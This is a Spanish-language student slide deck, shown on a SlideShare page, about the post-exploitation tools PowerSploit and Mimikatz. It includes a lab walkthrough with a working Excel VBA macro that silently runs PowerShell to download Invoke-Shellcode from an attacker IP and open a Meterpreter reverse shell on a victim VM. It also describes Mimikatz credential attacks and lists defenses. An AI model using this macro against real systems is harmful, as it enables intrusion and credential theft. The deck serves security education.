SlideShare una empresa de Scribd logo
1 de 31
Universidad Nacional Micaela Bastidas de Apurímac
FACULTAD DE INGENÍERA
ESCUELAACADÉMICO PROFESIONAL DE INGENIERÍA INFORMÁTICA Y SISTEMAS
HERRAMIENTAS DE EXPLOTACION -
POWERSPLOIT - MIMIKATS
CURSO : Administración de Redes
DOCENTE : Ing. Elvio Tintaya Zegarra
ESTUDIANTES : Alvites León Melitza Graciela
: Cruz Camero Tatiana Ruby
: Gonzales Huamani Yulissa
: Zeilú Massiel Moreano Falcón
: Pedro Luis Ninamanco Pizarro
HERRAMIENTAS DE
EXPLOTACIÓN
Son herramientas que se utilizan para crear
espacios de trabajo de seguridad para pruebas
de vulnerabilidad y sistemas de prueba de
penetración. Es un software completamente
de código abierto y fácil de usar.
2
¿Qué son las herramientas de explotación en Kali Linux?
¿Qué son las herramientas de explotación?
3
Son programas y scripts de
computadora que lo ayudan a
encontrar y aprovechar las
debilidades en los sistemas
informáticos, aplicaciones web,
servidores y redes.
¿ Cuáles son herramientas de
explotación ?
• MetaSploit
• Msfpayload
• Searchsploit
• Social engineering toolkit (root)
• sqlmap
Herramientas post – explotación
Determinar el valor de la máquina comprometida y mantener el control de la
máquina para su uso posterior. El valor de la máquina está determinado por la
sensibilidad de los datos almacenados en ella y la utilidad de la máquina para
comprometer aún más la red..
⬥ backdoor-factory
⬥ bdfproxy
⬥ intersect
⬥ nishang
⬥ powersploit
⬥ proxychains
PowerSploit
Explotación de poder
1
“
“PowerSploit'' es una colección de
módulos de Microsoft PowerShell que
se pueden usar para ayudar a los
evaluadores de penetración durante
todas las fases de una evaluación.
PowerSploit se compone de los
siguientes módulos y scripts”
– MATT GRAEBER
7
VISION GENERAL
Es una herramienta que trata de una
colección de utilidades que van a
ser de gran interés para nuestros
pentests. Cuenta con muchos
módulos con distintos fines:
ejecución de código, modificación
de sripts, persistencia, exfiltración,
bypass de antivirus, elevación de
privilegios, etc.
Recuperado de: https://www.boomernix.com/2019/01/powersploit-windows-
hacking.html#:~:text=Se%20trata%20de%20una%20colecci%C3%B3n,%2C%20elevaci%C3%B3n%20de%20privilegios%
2C%20etc. 8
PowerSploit es una colección
de módulos de Microsoft
Powershell, que pueden ser
utilizados por los pentesters
durante toda la fase del
mismo.
Características:
⬥ Permite al usuario ejecutar
scripts en el sistema de destino
⬥ Omitir antivirus
⬥ Extraer datos de la máquina de
destino
⬥ Escuche el micrófono de la
máquina de destino
9
Plataformas compatibles:
10
Requisitos:
⬥ PowerShell
Módulos y guiones:
12
13
Licencia:
⬥ El proyecto PowerSploit y todos los scripts
individuales están bajo la licencia BSD de 3
cláusulas, a menos que se indique explícitamente lo
contrario.
14
Ahí podemos ver como se dividen los distintos módulos con ls:
PASOS:
1. Creamos una Carpeta por ejemplo que se llame «PowerSploit
1. Abrimos la consola y ejecutamos «git clone
https://github.com/mattifestation/PowerSploit.git»
15
16
3. Nos vamos a la carpeta que se acaba de descargar y entramos a la que se llama
«CodeExcution» y copiamos al HOME el archivo que se llama «Invoke–Shellcode.ps1»
17
4. Abrimos la Consola de Metasploit , ejecutamos el multi handler y configuramos con la IP del
atacante, usamos ExitOnSession luego que se nos cierra el puerto de la víctima continúa abierto
y exploit –j para correr en background, algo así:
18
5. Eso no tocamos más… ahora es tiempo de copiar la macro en un Excel y enviar a la maquina
virtual VICTIMA, amigo no te olvides de cambiar las ip
Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = «.»
Set objWMIService = GetObject(«winmgmts:» & strComputer & «rootcimv2»)
Set objStartup = objWMIService.Get(«Win32_ProcessStartup»)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(«winmgmts:» & strComputer & «rootcimv2:Win32_Process»)
objProcess.Create «powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX
((New-Object Net.WebClient).DownloadString(‘http://192.168.116.131/Invoke–Shellcode.ps1′)); Invoke-
Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.116.131
-Lport 4444 -Force», Null, objConfig, intProcessID
End Function
19
6. Abrimos otra Shell y buscamos el archivo «Invoke- – Shellcode.ps1» y le damos permiso de
ejecución de la siguiente manera:
7. Luego ejecutamos «Python –m SimpleHTTPServer 80«
8. Abrimos el EXCEL en la maquina VICTIMA
20
9. En la consola que ejecutamos el
SImpleHTTPServer vamos a ver algo así…
Y en la consola de Metasploit vamos a tener algo
así:
Ya tendríamos una sesión de Meterpreter activa!!
21
⬥ Para usar el módulo, escriba lo siguiente en la
ventana de PowerShell:
Import-Module PowerSploit
⬥ Para enumerar los comandos importados, escriba:
Get-Command-Module PowerSploit
⬥ Para obtener ayuda sobre cada comando, ejecute:
Get-Help
USO:
Técnicas Utilizadas
22
MIMIKATZ
Aplicación de código abierto
2
Historia
26
Delpy descubrió el defecto WDigest en la autenticación de Windows
en 2011, pero Microsoft lo descartó cuando informó de la
vulnerabilidad. En respuesta, creó Mimikatz, escrito en C, y lanzó el
binario a Internet, donde rápidamente ganó popularidad entre los
investigadores de seguridad, sin mencionar la atención no deseada
de los gobiernos de todo el mundo, lo que resultó en la eventual
liberación del código fuente en GitHub.
Mimikatz es una aplicación de
código abierto que permite a los
usuarios manipular las credenciales
de autenticación en los sistemas
Windows. Creado para funcionar
como una herramienta de prueba de
concepto para la seguridad de
Windows, los piratas informáticos
han utilizado Mimikatz para
comprometer muchos tipos
diferentes de sistemas.
27
¿Cómo funciona
Mimikatz?
Mimikatz puede utilizar técnicas para
recopilar credenciales.
⬥ PASS-THE-TICKET
Los datos de contraseña
de un usuario en Windows
se guardan en los llamados
Tickets Kerberos ⬥ KERBEROS GOLDEN
TICKET
Este es un ataque tipo Pass
the Ticket. Este ticket
corresponde a una cuenta
oculta llamada KRBTGT
29
⬥ KERBEROS SILVER
TICKET
Kerberos otorga un ticket
TGS a un usuario y este
puede utilizarlo para
conectarse a cualquier
servicio de la red.
30
⬥ PASS-THE-CACHE
También podría entrar en la
clasificación de ataques tipo Pass the
Ticket. La única diferencia es que en
este caso; Mimikatz utiliza los datos
de conexión grabados y cifrados de
un sistema Mac/UNIX/Linux.
⬥ PASS-THE-HASH
No importa si el atacante no
tiene acceso a la contraseña
en texto plano, del dispositivo
al que quiere saber. Con
Mimikatz, el hacker puede
usar los hashes NTLM para
autenticarse y acceder al
sistema.
Mimikatz puede utilizar técnicas para
recopilar credenciales.
Pasos para la protección contra Mimikatz
⬥ Vigilancia Actualizaciones Mimikatz
⬥ Deshabilitar WDigest
⬥ Protección LSA
⬥ Debug privilege
⬥ Caché de credenciales
⬥ EDR IA Estática y de Comportamiento
31

Más contenido relacionado

Similar a HerramientasExplotacion-GRUPO5.pptx

Ms config
Ms configMs config
Ms configDGS
 
Amenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticaAmenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticafillescas
 
Herramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesHerramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesSergio Fuentes
 
Seguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasSeguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasArturo Hoffstadt
 
Pruebas de penetración
Pruebas de penetraciónPruebas de penetración
Pruebas de penetraciónDavid Thomas
 
Herramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesHerramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesDaniel Fernandez Droniak
 
Ya revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasYa revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasTensor
 
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo realA3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo reala3sec
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Cristián Rojas, MSc., CSSLP
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...Héctor López
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAMConferencias FIST
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Arquitectura de software y hardware 2014
Arquitectura de software y hardware 2014Arquitectura de software y hardware 2014
Arquitectura de software y hardware 2014nathaliaalvarez26
 

Similar a HerramientasExplotacion-GRUPO5.pptx (20)

Ms config
Ms configMs config
Ms config
 
Amenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticaAmenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informatica
 
Herramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesHerramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidades
 
Seguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasSeguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de Sistemas
 
Pruebas de penetración
Pruebas de penetraciónPruebas de penetración
Pruebas de penetración
 
Analaisis de malwatre trickbot - mp alonso
Analaisis de malwatre   trickbot - mp alonsoAnalaisis de malwatre   trickbot - mp alonso
Analaisis de malwatre trickbot - mp alonso
 
Herramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesHerramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidades
 
Ya revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasYa revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traseras
 
2012temariohackingv9
2012temariohackingv92012temariohackingv9
2012temariohackingv9
 
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo realA3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
 
PRESENTACION bajo costo.pptx
PRESENTACION bajo costo.pptxPRESENTACION bajo costo.pptx
PRESENTACION bajo costo.pptx
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
 
Test de intrusion
Test de intrusionTest de intrusion
Test de intrusion
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
Practica 6
Practica 6Practica 6
Practica 6
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Arquitectura de software y hardware 2014
Arquitectura de software y hardware 2014Arquitectura de software y hardware 2014
Arquitectura de software y hardware 2014
 
Investigacion seguridad 2
Investigacion seguridad 2Investigacion seguridad 2
Investigacion seguridad 2
 
Amenazas lógicas
Amenazas lógicasAmenazas lógicas
Amenazas lógicas
 

Último

Institucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenaInstitucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenadanielaerazok
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx241518192
 
Buscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webBuscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webDecaunlz
 
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAINSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAdanielaerazok
 
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsxactividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx241532171
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfYuriFuentesMartinez2
 
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptxPRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptxRodriguezLucero
 
institucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenainstitucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenajuniorcuellargomez
 
locomotas v siclo.ppt de ingenieria de minas
locomotas v siclo.ppt de ingenieria de minaslocomotas v siclo.ppt de ingenieria de minas
locomotas v siclo.ppt de ingenieria de minasMirkaCBauer
 
libro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdflibro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdfFAUSTODANILOCRUZCAST
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxssuser61dda7
 
Producto académico 03 - Habilidades Comunicativas.pptx
Producto académico 03 - Habilidades Comunicativas.pptxProducto académico 03 - Habilidades Comunicativas.pptx
Producto académico 03 - Habilidades Comunicativas.pptx46828205
 
MODELO CARACTERIZACION DE PROCESOS SENA.
MODELO CARACTERIZACION DE PROCESOS SENA.MODELO CARACTERIZACION DE PROCESOS SENA.
MODELO CARACTERIZACION DE PROCESOS SENA.imejia2411
 
3Mayo2023 Taller construcción de Prototipos.pptx
3Mayo2023 Taller construcción de Prototipos.pptx3Mayo2023 Taller construcción de Prototipos.pptx
3Mayo2023 Taller construcción de Prototipos.pptxadso2024sena
 
Historia de la Medicina y bases para desarrollo de ella
Historia de la Medicina y bases para desarrollo de ellaHistoria de la Medicina y bases para desarrollo de ella
Historia de la Medicina y bases para desarrollo de ellajuancamilo3111391
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.ayalayenifer617
 
COMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfCOMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfOscarBlas6
 
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdfFernandaHernandez312615
 

Último (18)

Institucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenaInstitucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalena
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
 
Buscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webBuscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la web
 
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAINSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
 
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsxactividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
actividad.06_crea_un_recurso_multimedia_M01_S03_M01.ppsx
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
 
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptxPRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
PRIMARIA 1. RESUELVE PROBLEMAS DE FORMA MOVIMIENTO Y LOCALIZACIÓN 2 (2).pptx
 
institucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenainstitucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalena
 
locomotas v siclo.ppt de ingenieria de minas
locomotas v siclo.ppt de ingenieria de minaslocomotas v siclo.ppt de ingenieria de minas
locomotas v siclo.ppt de ingenieria de minas
 
libro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdflibro de Ciencias Sociales_6to grado.pdf
libro de Ciencias Sociales_6to grado.pdf
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
 
Producto académico 03 - Habilidades Comunicativas.pptx
Producto académico 03 - Habilidades Comunicativas.pptxProducto académico 03 - Habilidades Comunicativas.pptx
Producto académico 03 - Habilidades Comunicativas.pptx
 
MODELO CARACTERIZACION DE PROCESOS SENA.
MODELO CARACTERIZACION DE PROCESOS SENA.MODELO CARACTERIZACION DE PROCESOS SENA.
MODELO CARACTERIZACION DE PROCESOS SENA.
 
3Mayo2023 Taller construcción de Prototipos.pptx
3Mayo2023 Taller construcción de Prototipos.pptx3Mayo2023 Taller construcción de Prototipos.pptx
3Mayo2023 Taller construcción de Prototipos.pptx
 
Historia de la Medicina y bases para desarrollo de ella
Historia de la Medicina y bases para desarrollo de ellaHistoria de la Medicina y bases para desarrollo de ella
Historia de la Medicina y bases para desarrollo de ella
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.
 
COMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfCOMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdf
 
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf2º SOY LECTOR PART 2- MD  EDUCATIVO (6).pdf
2º SOY LECTOR PART 2- MD EDUCATIVO (6).pdf
 

HerramientasExplotacion-GRUPO5.pptx

  • 1. Universidad Nacional Micaela Bastidas de Apurímac FACULTAD DE INGENÍERA ESCUELAACADÉMICO PROFESIONAL DE INGENIERÍA INFORMÁTICA Y SISTEMAS HERRAMIENTAS DE EXPLOTACION - POWERSPLOIT - MIMIKATS CURSO : Administración de Redes DOCENTE : Ing. Elvio Tintaya Zegarra ESTUDIANTES : Alvites León Melitza Graciela : Cruz Camero Tatiana Ruby : Gonzales Huamani Yulissa : Zeilú Massiel Moreano Falcón : Pedro Luis Ninamanco Pizarro
  • 2. HERRAMIENTAS DE EXPLOTACIÓN Son herramientas que se utilizan para crear espacios de trabajo de seguridad para pruebas de vulnerabilidad y sistemas de prueba de penetración. Es un software completamente de código abierto y fácil de usar. 2 ¿Qué son las herramientas de explotación en Kali Linux?
  • 3. ¿Qué son las herramientas de explotación? 3 Son programas y scripts de computadora que lo ayudan a encontrar y aprovechar las debilidades en los sistemas informáticos, aplicaciones web, servidores y redes.
  • 4. ¿ Cuáles son herramientas de explotación ? • MetaSploit • Msfpayload • Searchsploit • Social engineering toolkit (root) • sqlmap
  • 5. Herramientas post – explotación Determinar el valor de la máquina comprometida y mantener el control de la máquina para su uso posterior. El valor de la máquina está determinado por la sensibilidad de los datos almacenados en ella y la utilidad de la máquina para comprometer aún más la red.. ⬥ backdoor-factory ⬥ bdfproxy ⬥ intersect ⬥ nishang ⬥ powersploit ⬥ proxychains
  • 7. “ “PowerSploit'' es una colección de módulos de Microsoft PowerShell que se pueden usar para ayudar a los evaluadores de penetración durante todas las fases de una evaluación. PowerSploit se compone de los siguientes módulos y scripts” – MATT GRAEBER 7
  • 8. VISION GENERAL Es una herramienta que trata de una colección de utilidades que van a ser de gran interés para nuestros pentests. Cuenta con muchos módulos con distintos fines: ejecución de código, modificación de sripts, persistencia, exfiltración, bypass de antivirus, elevación de privilegios, etc. Recuperado de: https://www.boomernix.com/2019/01/powersploit-windows- hacking.html#:~:text=Se%20trata%20de%20una%20colecci%C3%B3n,%2C%20elevaci%C3%B3n%20de%20privilegios% 2C%20etc. 8 PowerSploit es una colección de módulos de Microsoft Powershell, que pueden ser utilizados por los pentesters durante toda la fase del mismo.
  • 9. Características: ⬥ Permite al usuario ejecutar scripts en el sistema de destino ⬥ Omitir antivirus ⬥ Extraer datos de la máquina de destino ⬥ Escuche el micrófono de la máquina de destino 9
  • 12. 12
  • 13. 13 Licencia: ⬥ El proyecto PowerSploit y todos los scripts individuales están bajo la licencia BSD de 3 cláusulas, a menos que se indique explícitamente lo contrario.
  • 14. 14 Ahí podemos ver como se dividen los distintos módulos con ls:
  • 15. PASOS: 1. Creamos una Carpeta por ejemplo que se llame «PowerSploit 1. Abrimos la consola y ejecutamos «git clone https://github.com/mattifestation/PowerSploit.git» 15
  • 16. 16 3. Nos vamos a la carpeta que se acaba de descargar y entramos a la que se llama «CodeExcution» y copiamos al HOME el archivo que se llama «Invoke–Shellcode.ps1»
  • 17. 17 4. Abrimos la Consola de Metasploit , ejecutamos el multi handler y configuramos con la IP del atacante, usamos ExitOnSession luego que se nos cierra el puerto de la víctima continúa abierto y exploit –j para correr en background, algo así:
  • 18. 18 5. Eso no tocamos más… ahora es tiempo de copiar la macro en un Excel y enviar a la maquina virtual VICTIMA, amigo no te olvides de cambiar las ip Public Function Execute() As Variant Const HIDDEN_WINDOW = 0 strComputer = «.» Set objWMIService = GetObject(«winmgmts:» & strComputer & «rootcimv2») Set objStartup = objWMIService.Get(«Win32_ProcessStartup») Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject(«winmgmts:» & strComputer & «rootcimv2:Win32_Process») objProcess.Create «powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString(‘http://192.168.116.131/Invoke–Shellcode.ps1′)); Invoke- Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.116.131 -Lport 4444 -Force», Null, objConfig, intProcessID End Function
  • 19. 19 6. Abrimos otra Shell y buscamos el archivo «Invoke- – Shellcode.ps1» y le damos permiso de ejecución de la siguiente manera: 7. Luego ejecutamos «Python –m SimpleHTTPServer 80« 8. Abrimos el EXCEL en la maquina VICTIMA
  • 20. 20 9. En la consola que ejecutamos el SImpleHTTPServer vamos a ver algo así… Y en la consola de Metasploit vamos a tener algo así: Ya tendríamos una sesión de Meterpreter activa!!
  • 21. 21 ⬥ Para usar el módulo, escriba lo siguiente en la ventana de PowerShell: Import-Module PowerSploit ⬥ Para enumerar los comandos importados, escriba: Get-Command-Module PowerSploit ⬥ Para obtener ayuda sobre cada comando, ejecute: Get-Help USO:
  • 23.
  • 24.
  • 26. Historia 26 Delpy descubrió el defecto WDigest en la autenticación de Windows en 2011, pero Microsoft lo descartó cuando informó de la vulnerabilidad. En respuesta, creó Mimikatz, escrito en C, y lanzó el binario a Internet, donde rápidamente ganó popularidad entre los investigadores de seguridad, sin mencionar la atención no deseada de los gobiernos de todo el mundo, lo que resultó en la eventual liberación del código fuente en GitHub.
  • 27. Mimikatz es una aplicación de código abierto que permite a los usuarios manipular las credenciales de autenticación en los sistemas Windows. Creado para funcionar como una herramienta de prueba de concepto para la seguridad de Windows, los piratas informáticos han utilizado Mimikatz para comprometer muchos tipos diferentes de sistemas. 27
  • 29. Mimikatz puede utilizar técnicas para recopilar credenciales. ⬥ PASS-THE-TICKET Los datos de contraseña de un usuario en Windows se guardan en los llamados Tickets Kerberos ⬥ KERBEROS GOLDEN TICKET Este es un ataque tipo Pass the Ticket. Este ticket corresponde a una cuenta oculta llamada KRBTGT 29 ⬥ KERBEROS SILVER TICKET Kerberos otorga un ticket TGS a un usuario y este puede utilizarlo para conectarse a cualquier servicio de la red.
  • 30. 30 ⬥ PASS-THE-CACHE También podría entrar en la clasificación de ataques tipo Pass the Ticket. La única diferencia es que en este caso; Mimikatz utiliza los datos de conexión grabados y cifrados de un sistema Mac/UNIX/Linux. ⬥ PASS-THE-HASH No importa si el atacante no tiene acceso a la contraseña en texto plano, del dispositivo al que quiere saber. Con Mimikatz, el hacker puede usar los hashes NTLM para autenticarse y acceder al sistema. Mimikatz puede utilizar técnicas para recopilar credenciales.
  • 31. Pasos para la protección contra Mimikatz ⬥ Vigilancia Actualizaciones Mimikatz ⬥ Deshabilitar WDigest ⬥ Protección LSA ⬥ Debug privilege ⬥ Caché de credenciales ⬥ EDR IA Estática y de Comportamiento 31